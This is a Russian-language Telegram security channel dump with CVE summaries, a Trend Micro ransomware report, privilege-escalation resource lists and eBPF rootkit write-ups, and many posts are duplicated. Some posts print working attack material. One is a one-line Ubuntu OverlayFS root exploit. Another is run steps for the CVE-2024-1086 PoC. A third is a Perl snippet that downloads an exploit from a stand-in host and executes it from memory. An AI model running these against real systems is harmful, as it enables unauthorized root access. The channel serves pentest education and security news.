#Linux #CVE
Уязвимость ядра Linux Privilege Escalation
CVE-2022-32250
Уязвимость функции nft_expr_init (net/netfilter/nf_tables_api.c) программного обеспечения фильтрации пакетов Netfilter ядра операционной системы Linux связана с возможностью использования памяти после освобождения. Эксплуатация уязвимости может позволить нарушителю повысить свои привилегии до уровня root
Уязвимость ядра Linux Privilege Escalation
CVE-2022-32250
Уязвимость функции nft_expr_init (net/netfilter/nf_tables_api.c) программного обеспечения фильтрации пакетов Netfilter ядра операционной системы Linux связана с возможностью использования памяти после освобождения. Эксплуатация уязвимости может позволить нарушителю повысить свои привилегии до уровня root
#Linux #CVE
Уязвимость Dnsmasq
CVE-2022-0934
Уязвимость легковесного DNS-, DHCP- и TFTP-сервера Dnsmasq связана с ошибкой использования памяти после освобождения при обработке запросов DHCPv6. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, отправить специально созданные пакеты DHCPv6 уязвимому приложению, вызвать ошибку использования после освобождения и выполнить атаку типа «отказ в обслуживании» (DoS)
Уязвимость Dnsmasq
CVE-2022-0934
Уязвимость легковесного DNS-, DHCP- и TFTP-сервера Dnsmasq связана с ошибкой использования памяти после освобождения при обработке запросов DHCPv6. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, отправить специально созданные пакеты DHCPv6 уязвимому приложению, вызвать ошибку использования после освобождения и выполнить атаку типа «отказ в обслуживании» (DoS)
#Linux #CVE
Уязвимость libinput
CVE-2022-1215
Уязвимость функции evdev_log_msg библиотеки libinput реализации протоколов серверов отображения X.Org и Wayland связана с использованием неконтролируемых форматных строк. Эксплуатация уязвимости может позволить нарушителю выполнить произвольный код с повышенными привилегиями
Уязвимость libinput
CVE-2022-1215
Уязвимость функции evdev_log_msg библиотеки libinput реализации протоколов серверов отображения X.Org и Wayland связана с использованием неконтролируемых форматных строк. Эксплуатация уязвимости может позволить нарушителю выполнить произвольный код с повышенными привилегиями
Forwarded from ITsec NEWS
🤖 Trend Micro: атаки вымогателей на Linux выросли на 75%.
💬 По данным компании Trend Micro Incorporated, в ближайшие годы группы программ-вымогателей будут все чаще атаковать серверы Linux и встроенные системы. В первом полугодии 2022 года зафиксировали двузначное увеличение числа атак на эти системы по сравнению с аналогичным периодом прошлого года.
Согласно отчету компании Trend Micro:
— 63 миллиарда угроз заблокировано Trend Micro в первом полугодии 2022 года;
— В первом полугодии зафиксировано на 52% больше угроз, чем за тот же период в 2021 году.
— Государственные учреждения, производство и здравоохранение - три ведущих сектора, подвергающихся атакам вредоносного ПО.
— Количество обнаружений RaaS-атак (Ransomware-as-a-Service) резко возросло в первой половине 2022 года. Число атак крупных игроков, таких как LockBit и Conti за год выросло на 500%. Более того, количество обнаружений атак этих групп удвоилось за 6 месяцев.
RaaS-модель принесла значительную прибыль разработчикам программ-вымогателей и их аффилированным лицам.
Постоянно появляются новые группы вымогателей. Наиболее заметная в первой половине 2022 года — Black Basta. Всего за 2 месяца группа поразила 50 организаций.
Один из основных векторов атак программ-вымогателей — использование уязвимостей. В рамках инициативы Zero Day Initiative Trend Micro за рассматриваемый период опубликовала рекомендации по 944 уязвимостям. Это на 23% больше, чем в прошлом году. Количество опубликованных рекомендаций по критическим ошибкам выросло на 400% по сравнению с прошлым годом.
APT-группы продолжают совершенствовать свои методы, используя обширную инфраструктуру и комбинируя несколько инструментов вредоносного ПО. Десятикратное увеличение числа обнаружений - еще одно доказательство того, что злоумышленники все чаще интегрируют Emotet в свои тщательно продуманные киберпреступные операции.
Проблема в том, что злоумышленники могут использовать недостатки быстрее, чем поставщики успевают выпустить исправления и/или клиенты могут их исправить.
Неисправленные уязвимости усугубляют растущую поверхность цифровых атак, с которой многие организации пытаются безопасно справляться в условиях расширения ИТ-среды за счет гибридных рабочих мест. Более двух пятых (43%) глобальных организаций считают, что проблема «выходит из-под контроля».
Облачная видимость особенно важна, учитывая постоянную угрозу использования третьими лицами неправильно сконфигурированных сред и применения новых методов, таких как облачный крипто-майнинг и облачное туннелирование. Последний часто пользуются злоумышленники для перенаправления трафика вредоносных программ или размещения фишинговых веб-сайтов.
#TrendMicro #Linux #Кибератака
🔔 ITsec NEWS
💬 По данным компании Trend Micro Incorporated, в ближайшие годы группы программ-вымогателей будут все чаще атаковать серверы Linux и встроенные системы. В первом полугодии 2022 года зафиксировали двузначное увеличение числа атак на эти системы по сравнению с аналогичным периодом прошлого года.
Согласно отчету компании Trend Micro:
— 63 миллиарда угроз заблокировано Trend Micro в первом полугодии 2022 года;
— В первом полугодии зафиксировано на 52% больше угроз, чем за тот же период в 2021 году.
— Государственные учреждения, производство и здравоохранение - три ведущих сектора, подвергающихся атакам вредоносного ПО.
— Количество обнаружений RaaS-атак (Ransomware-as-a-Service) резко возросло в первой половине 2022 года. Число атак крупных игроков, таких как LockBit и Conti за год выросло на 500%. Более того, количество обнаружений атак этих групп удвоилось за 6 месяцев.
RaaS-модель принесла значительную прибыль разработчикам программ-вымогателей и их аффилированным лицам.
Постоянно появляются новые группы вымогателей. Наиболее заметная в первой половине 2022 года — Black Basta. Всего за 2 месяца группа поразила 50 организаций.
Один из основных векторов атак программ-вымогателей — использование уязвимостей. В рамках инициативы Zero Day Initiative Trend Micro за рассматриваемый период опубликовала рекомендации по 944 уязвимостям. Это на 23% больше, чем в прошлом году. Количество опубликованных рекомендаций по критическим ошибкам выросло на 400% по сравнению с прошлым годом.
APT-группы продолжают совершенствовать свои методы, используя обширную инфраструктуру и комбинируя несколько инструментов вредоносного ПО. Десятикратное увеличение числа обнаружений - еще одно доказательство того, что злоумышленники все чаще интегрируют Emotet в свои тщательно продуманные киберпреступные операции.
Проблема в том, что злоумышленники могут использовать недостатки быстрее, чем поставщики успевают выпустить исправления и/или клиенты могут их исправить.
Неисправленные уязвимости усугубляют растущую поверхность цифровых атак, с которой многие организации пытаются безопасно справляться в условиях расширения ИТ-среды за счет гибридных рабочих мест. Более двух пятых (43%) глобальных организаций считают, что проблема «выходит из-под контроля».
Облачная видимость особенно важна, учитывая постоянную угрозу использования третьими лицами неправильно сконфигурированных сред и применения новых методов, таких как облачный крипто-майнинг и облачное туннелирование. Последний часто пользуются злоумышленники для перенаправления трафика вредоносных программ или размещения фишинговых веб-сайтов.
#TrendMicro #Linux #Кибератака
🔔 ITsec NEWS
#Linux #CVE
Zyxel Firewall SUID Binary Privilege Escalation
CVE-2022-30526
Локальную уязвимость повышения привилегий, которая позволяет низкопривилегированному пользователю (например, nobody) повысить права до root. Проблема связана с бинарным файлом suid, который позволяет всем пользователям копировать файлы от имени root. Этот модуль перезаписывает кронтаб брандмауэра для выполнения скрипта, предоставленного злоумышленником, что приводит к выполнению кода от имени root. Чтобы использовать этот модуль, злоумышленник должен сначала получить доступ к оболочке.
Zyxel Firewall SUID Binary Privilege Escalation
CVE-2022-30526
Локальную уязвимость повышения привилегий, которая позволяет низкопривилегированному пользователю (например, nobody) повысить права до root. Проблема связана с бинарным файлом suid, который позволяет всем пользователям копировать файлы от имени root. Этот модуль перезаписывает кронтаб брандмауэра для выполнения скрипта, предоставленного злоумышленником, что приводит к выполнению кода от имени root. Чтобы использовать этот модуль, злоумышленник должен сначала получить доступ к оболочке.
This media is not supported in your browser
VIEW IN TELEGRAM
#Linux #CVE
LPE 0day exploit
CVE-2022-37706
This 0-day is gonna take any user to root privileges very easily and instantly.
The exploit is tested on Ubuntu 22.04, but should work just fine on any distro.
LPE 0day exploit
CVE-2022-37706
This 0-day is gonna take any user to root privileges very easily and instantly.
The exploit is tested on Ubuntu 22.04, but should work just fine on any distro.
❤2👍1
Для понимания приведу пример простого парсинга результатов сканирования с помощью masscan.
sudo masscan --rate=10000 -p 1-65535 rest.vulnweb.com -oL masscan.txtНо вы получаете строчки, где много лишней информации, тогда вам нужна такая команда:
cut -d " " -f 3 -s masscan.txt | awk -v RS='' '{gsub("\n", ","); print}' - но команда выглядит достаточно сложно для новичков в Linux. #linux #начинающим
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤🔥3⚡1
Local Privilege Escalation glibc's ld.so (CVE-2023-4911)
➡️ Исследование
🔥 POC: https://github.com/leesh3288/CVE-2023-4911
#linux #lpe
💬 Канал | 📶 Github
#linux #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - leesh3288/CVE-2023-4911: PoC for CVE-2023-4911
PoC for CVE-2023-4911. Contribute to leesh3288/CVE-2023-4911 development by creating an account on GitHub.
🔥6
This media is not supported in your browser
VIEW IN TELEGRAM
1-Click RCE on GNOME (CVE-2023-43641)
#RCE #linux #gnome #cve
Сегодня, в сотрудничестве с Ильей Липницким, Лаборатория безопасности GitHub раскрывает CVE-2023-43641, уязвимость memory corruption в libcue. Мы также отправили текстовую версию этой записи в список oss-security list.
🖥 Статья | 🛡 Дневник Безопасника
#RCE #linux #gnome #cve
Сегодня, в сотрудничестве с Ильей Липницким, Лаборатория безопасности GitHub раскрывает CVE-2023-43641, уязвимость memory corruption в libcue. Мы также отправили текстовую версию этой записи в список oss-security list.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🆒1
root with a single command: sudo logrotate
#LPE #linux
Сценарий таков: на совершенно новом сервере Ubuntu 22.04 есть учетная запись, которая для которой прописано:
🔥 Статья | 🛡 Дневник Безопасника
#LPE #linux
Сценарий таков: на совершенно новом сервере Ubuntu 22.04 есть учетная запись, которая для которой прописано:
sudo logrotate *. Сможем ли мы получить root? Короткий ответ: Да. Автор не смог найти в Интернете интересной информации о подобной эксплуатации logrotate, поэтому давайте изучим подробнее.Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
This media is not supported in your browser
VIEW IN TELEGRAM
#windows #linux #macos #LPE #privesc
Я думаю многие из нас слышали про GTFOBins — cheatsheet по повышению привилегий в Linux. Но что же делать, если вы попали на Windows или MacOS?
1. LOLBAS — аналог GTFOBins только для Windows
2. LOLDrivers — cheatsheet по уязвимым драйверам Windows
1. LOOBins — тут собрано множество тем, таких как разведка, закрепление, повышение привилегий, обход средств защиты и т.д.
1. GTFOArgs — тот случай, когда даже GTFOBins не хватает, то вы всё ещё можете попробовать сделать PrivEsc через аргументы к различными командам.
ㅤ
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡12❤8👍3🔥2
#linux #LPE
Если кратко, то скрипт на PowerShell парсит логи на наличие данных авторизации. На первый взгляд классная штука.
Как получится воспользоваться на проекте, отпишу фидбек)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9❤1
Ubuntu Privilege escalation
CVE-2023-32629 & CVE-2023-2640
#linux #LPE #полезное
PoC:
📌 Не забывайте убрать следы эксплуатации (папки l u w m):
🌚 @poxek
CVE-2023-32629 & CVE-2023-2640
#linux #LPE #полезное
PoC:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"
rm -rf l u w m
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE
➡️ Github PoC
🌚 @poxek
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
perl -e '
require qw/syscall.ph/;
my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14
Forwarded from Proxy Bar
Доброй ночи.
Написал небольшуюкнижку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
Написал небольшую
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
eBPF как следующая эра в Linux Rootkit-разработке: механизмы, детектирование и активная нейтрализация
#ebpf #linux #rootkit #malwdev #malware #red_team #blue_team
С момента появления eBPF (Extended Berkeley Packet Filter) в ядре Linux версии 3.18 технология позиционировалась как инструмент для высокопроизводительного мониторинга, сетевой фильтрации и профилирования системных вызовов.
Однако с точки зрения безопасности eBPF представляет собой интерпретатор байткода в пространстве ядра, что превращает его в уникальный механизм внедрения и перехвата на уровне kernel-space без загрузки модулей.
В последние годы (2022–2025) были зафиксированы кейсы, где eBPF использовался в целях обхода средств защиты, скрытия сетевой активности и модификации поведения системных вызовов.
Эта статья описывает реальный подход к:
▪️ детектированию вредоносных eBPF-программ
▪️ анализу их поведения
▪️ активной блокировке загрузки до момента исполнения
🔗 blog.poxek
🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#ebpf #linux #rootkit #malwdev #malware #red_team #blue_team
С момента появления eBPF (Extended Berkeley Packet Filter) в ядре Linux версии 3.18 технология позиционировалась как инструмент для высокопроизводительного мониторинга, сетевой фильтрации и профилирования системных вызовов.
Однако с точки зрения безопасности eBPF представляет собой интерпретатор байткода в пространстве ядра, что превращает его в уникальный механизм внедрения и перехвата на уровне kernel-space без загрузки модулей.
В последние годы (2022–2025) были зафиксированы кейсы, где eBPF использовался в целях обхода средств защиты, скрытия сетевой активности и модификации поведения системных вызовов.
Эта статья описывает реальный подход к:
Please open Telegram to view this post
VIEW IN TELEGRAM
😱4🌚1
LinkPro: Новая эра eBPF-руткитов с "магическими пакетами"
#malware #eBPF #linux #kernel #hardening
Исследователи Synacktiv обнаружили изощренный руткит LinkPro, написанный на Golang и использующий технологию eBPF для сокрытия в ядре Linux. Этот backdoor демонстрирует качественный скачок в техниках сокрытия вредоносного ПО, сочетая kernel-level hiding с удаленной активацией через "magic packets" и представляя новый уровень сложности для систем обнаружения.
➡️ Hide&Seek
Руткит состоит из двух ключевых eBPF модулей: Hide модуль для сокрытия процессов, файлов и артефактов, и Knock модуль для удаленной активации. Такая модульная архитектура позволяет гибко управлять функциональностью и обеспечивает отказоустойчивость системы сокрытия.
"Магические пакеты" для активации
Уникальная особенность LinkPro — активация через TCP SYN-пакеты с размером окна 54321. Этот механизм позволяет злоумышленнику удаленно "пробуждать" спящий backdoor без необходимости поддерживать постоянные сетевые соединения или открытые порты.
При получении такого пакета Knock модуль перенаправляет трафик на внутренний порт для установления C2-связи, обеспечивая полностью пассивное прослушивание без демаскирующих признаков активной сетевой активности.
🔗 blog.poxek
🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#malware #eBPF #linux #kernel #hardening
Исследователи Synacktiv обнаружили изощренный руткит LinkPro, написанный на Golang и использующий технологию eBPF для сокрытия в ядре Linux. Этот backdoor демонстрирует качественный скачок в техниках сокрытия вредоносного ПО, сочетая kernel-level hiding с удаленной активацией через "magic packets" и представляя новый уровень сложности для систем обнаружения.
Руткит состоит из двух ключевых eBPF модулей: Hide модуль для сокрытия процессов, файлов и артефактов, и Knock модуль для удаленной активации. Такая модульная архитектура позволяет гибко управлять функциональностью и обеспечивает отказоустойчивость системы сокрытия.
"Магические пакеты" для активации
Уникальная особенность LinkPro — активация через TCP SYN-пакеты с размером окна 54321. Этот механизм позволяет злоумышленнику удаленно "пробуждать" спящий backdoor без необходимости поддерживать постоянные сетевые соединения или открытые порты.
# Концептуальный пример magic packet
# TCP SYN с window size 54321 активирует Knock модуль
tcpdump -i any 'tcp[tcpflags] & tcp-syn != 0 and tcp[14:2] = 54321'
При получении такого пакета Knock модуль перенаправляет трафик на внутренний порт для установления C2-связи, обеспечивая полностью пассивное прослушивание без демаскирующих признаков активной сетевой активности.
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯17
Ловите вкусные баги прошедшей недели
#CVE #RCE #Firefox #NetSNMP #Linux #OpenCode #NodeTar #zlib
➡️ Node-Tar (CVE-2026-23745, CVSS 8.2) — path traversal в популярной библиотеке node-tar для работы с TAR-архивами. Уязвимость кроется в недостаточной санитизации путей для жестких ссылок и symlink даже при включенной по умолчанию защите preservePaths: false. Библиотека использует path.resolve() без проверки выхода за пределы корневой директории распаковки, что позволяет через вредоносный архив перезаписывать произвольные файлы в системе или создавать ссылки на нужные для атаки пути. Может привести к RCE в CI/CD пайплайнах. Есть PoC.
➡️ OpenCode (CVE-2026-22812, CVSS 8.8) — RCE в open-source AI-агенте для написания кода. Уязвимость возникает из-за автоматического запуска HTTP-сервера без аутентификации. Из-за некорректных политик CORS любой веб-сайт может отправить запрос к локальному API агента, что позволяет удаленному атакующему выполнить произвольные shell-команды с правами текущего пользователя. Есть PoC.
➡️ Firefox + Thunderbird (CVE-2026-0881, CVSS 10.0) — sandbox escape в компоненте Messaging System браузера Firefox и клиента Thunderbird. Возникает из-за недостаточного контроля доступа при обработке сообщений, передаваемых от изолированного дочернего процесса к привилегированному родительскому. Позволяет скомпрометированному процессу рендеринга отправить специально сформированный запрос, который родительский процесс ошибочно исполнит, тем самым позволив выйти за пределы песочницы.
➡️ Net-SNMP (CVE-2025-68615, CVSS 10.0) — RCE в пакете net-snmp для работы с протоколом SNMP в Linux/Unix системах. Уязвимость возникает при обработке специально сформированных SNMP-пакетов (trap-сообщений) на UDP-порту 162. Демон некорректно валидирует длину пользовательских данных перед копированием, что позволяет удаленному атакующему вызвать stack buffer overflow и добиться RCE.
➡️ zlib (CVE-2026-22184, CVSS 10.0) — переполнение буфера в утилите untgz библиотеки zlib. Появляется из-за небезопасного копирования слишком длинного имени файла в статический буфер. Если атакующий передаст имя файла длиннее 1024 байт, происходит out-of-bounds write. Это ведет к порче памяти и может вызвать DoS или, в зависимости от компилятора и разметки памяти, RCE.
🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK
#CVE #RCE #Firefox #NetSNMP #Linux #OpenCode #NodeTar #zlib
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👾3